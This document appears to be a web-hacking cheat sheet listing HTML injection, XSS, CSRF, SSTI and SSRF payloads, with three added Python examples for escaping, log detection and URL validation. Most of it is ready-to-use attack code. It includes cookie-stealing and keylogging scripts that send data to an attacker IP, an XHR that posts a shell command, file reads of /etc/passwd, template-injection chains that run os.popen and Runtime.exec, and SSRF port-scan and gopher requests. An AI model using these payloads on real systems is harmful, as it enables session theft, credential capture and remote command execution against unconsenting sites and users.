XSS / HTMLi / (S/C)SRF / SSTI
01. HTML Injection
Basic Test Payloads
<h1>h4rithd was here</h1>
<b>h4rithd was here</b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>
<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>
02. Cross Site Scripting (XSS)
Steal Cookie
## ------------------| Setup on my machine
#### Basic h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))
## ------------------| Payload
<script src="http://<IP>/h4rithd.js"></script>
Payloads
nc -lvnp 80
<script>document.write('<img src="http://<MYIP>/logo.gif?cookie='+document.cookie+'"/>')</script>
<script>new Image().src="http://<MYIP>/logo.jpg?output="+document.cookie;</script>
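Added defensive example (mine, not part of the original notes): the section 01 payloads and the `<script src>` loader above only work when user input reaches the page unescaped. Using Python's stdlib HTML parser, this shows why escaping only angle brackets stops the element-context payloads but not a quoted-attribute break-out; the hostname and sample strings are constructed.

```python
import html
from html.parser import HTMLParser

# Constructed samples shaped like the payloads above (placeholder host, not a real one).
BREAKOUT = '" onmouseover="alert(1)" x="'            # no angle brackets at all
SCRIPT_TAG = '<script src="http://attacker.invalid/h4rithd.js"></script>'


class TagCollector(HTMLParser):
    """Record the tags and attribute names a browser would actually see."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def naive_escape(value):
    """Common incomplete fix: neutralise only the angle brackets."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def full_escape(value):
    """Escape ampersand, angle brackets and both quotes: inert in text and quoted-attribute context."""
    return html.escape(value, quote=True)


def render_element(value, escape):
    return f"<p>{escape(value)}</p>"


def render_attribute(value, escape):
    return f'<input type="text" value="{escape(value)}">'


def injected(rendered, expected_tag):
    """True if parsing yields an unexpected tag or any on* event-handler attribute."""
    parser = TagCollector()
    parser.feed(rendered)
    parser.close()
    extra_tags = [t for t in parser.tags if t != expected_tag]
    handlers = [a for a in parser.attrs if a.startswith("on")]
    return bool(extra_tags or handlers)


if __name__ == "__main__":
    for name, value in (("script tag", SCRIPT_TAG), ("attribute break-out", BREAKOUT)):
        for esc in (naive_escape, full_escape):
            print(f"{name:20} {esc.__name__:13} element={injected(render_element(value, esc), 'p')} "
                  f"attribute={injected(render_attribute(value, esc), 'input')}")
```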
## ------------------| Common payloads
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efim)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?j0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<img src=x onerror=this.src='http://10.10.14.22/?cookies='+btoa(document.cookie)/>
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>
## ------------------| Other Payloads
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<a onmouseover="alert(document.cookie)">xss link</a>
<a onmouseover=alert(document.cookie)>xss link</a>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>
## ------------------| Host this from your end
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);
# load it with this payload
<script src=http://10.10.14.22/script.js></script>
Server Side XSS (Dynamic PDF)
## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>
## If you need the output base64-encoded, use this handler instead.
x.onload=function(){document.write(btoa(this.responseText))};
Other APIs
## ------------------| Start the server that receives the data
sudo python3 -m http.server 80
## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>
## ------------------| Keyloggers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>
03. Cross-Site Request Forgery (CSRF)
Create Payload
<html>
<iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
<iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>
04. Server-Side Template Injection (SSTI)
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
${{<%[%'"}}%\.
{{.}}
{{user}}
{{config}}
{{password}}
{%include user%}
{%include config%}
{% include config %}
{%include password%}
{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
## ------------------| Spring Framework's
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}
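Added detection example (mine, not from the original notes): the probes and payloads listed above leave recognisable template syntax in request logs, but the `\x5f\x5f` trick in the `request|attr(...)` payload hides the dunder names from a naive string match. This scans constructed access-log lines, URL-decodes twice, undoes `\xNN` escapes, and separates harmless arithmetic probes from introspection chains.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic); the query strings carry probes shaped like those above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=alice HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /greet?name=%7B%7Brequest%7Cattr%28%27application%27%29%7Cattr%28%27%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%27%29%7D%7D HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /render?tpl=%24%7B%22%22.getClass%28%29.forName%28%22java.lang.Runtime%22%29%7D HTTP/1.1" 500 0
"""

REQUEST = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')
# Template delimiters from the probe list: {{ }}, ${ }, <%= %>, #{ }, *{ }, {% %}
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\$\{.*?\}|<%=.*?%>|[#*]\{.*?\}|\{%.*?%\}", re.S)
# Markers of the introspection / process-spawning chains shown above
INTROSPECTION = re.compile(
    r"__(?:globals|builtins|init|import|getitem|class|subclasses)__|\bpopen\b|forName|getRuntime", re.I)


def normalise(value, rounds=2):
    """Undo (double) URL-encoding, then turn \\xNN escapes back into the characters they hide."""
    for _ in range(rounds):
        value = unquote(value)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def classify(target):
    """Return ('none'|'probe'|'exploit', decoded request target)."""
    decoded = normalise(target)
    if not TEMPLATE_EXPR.search(decoded):
        return "none", decoded
    if INTROSPECTION.search(decoded):
        return "exploit", decoded
    return "probe", decoded


def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        level, decoded = classify(m.group(1))
        if level != "none":
            findings.append((level, decoded))
    return findings


if __name__ == "__main__":
    for level, decoded in scan(SAMPLE_LOG):
        print(f"{level:8} {decoded}")
```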
05. Server-Side Request Forgery (SSRF)
### Setup local web server
sudo python3 -m http.server 80
### Browse URL
### Scan local ports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2
Gopher
## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if vulnerable
### [\n ==> %0a or %25%30%61 (double encoded); space ==> %20 or %25%32%30 (double encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requests
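Added defensive example (mine, not from the original notes): the checks a `url.php?path=` style fetcher needs before it fetches anything, covering the three tricks used above (loopback `localhost:PORT`, non-HTTP schemes such as `gopher://`, and internal addresses). The resolver is a constructed stand-in table so the code runs offline; a real fetcher must connect to the address it validated, not re-resolve the name.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def fake_resolve(host):
    """Stand-in resolver (constructed table, not real DNS) so the demo runs offline."""
    table = {
        "localhost": ["127.0.0.1"],
        "metadata.internal": ["169.254.169.254"],   # constructed internal name
        "example.com": ["93.184.216.34"],           # constructed public address
    }
    return table.get(host.lower(), [])


def is_blocked_ip(ip_text):
    """Anything that is not a public unicast address is off limits for a server-side fetch."""
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_fetch_url(raw, resolve=fake_resolve):
    """Return (ok, reason) for a URL supplied by the user."""
    try:
        parts = urlsplit(raw)
        port = parts.port
    except ValueError:
        return False, "unparseable url or port"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        ips = [str(ipaddress.ip_address(host))]   # literal IP (v4 or v6)
    except ValueError:
        ips = resolve(host)                       # hostname: check every resolved address
    if not ips:
        return False, "unresolvable host"
    for ip in ips:
        if is_blocked_ip(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    for url in ("http://localhost:80", "gopher://10.0.0.9:80/_GET / HTTP/1.0",
                "http://169.254.169.254/latest/", "http://example.com/index.html"):
        print(url, "->", validate_fetch_url(url))
```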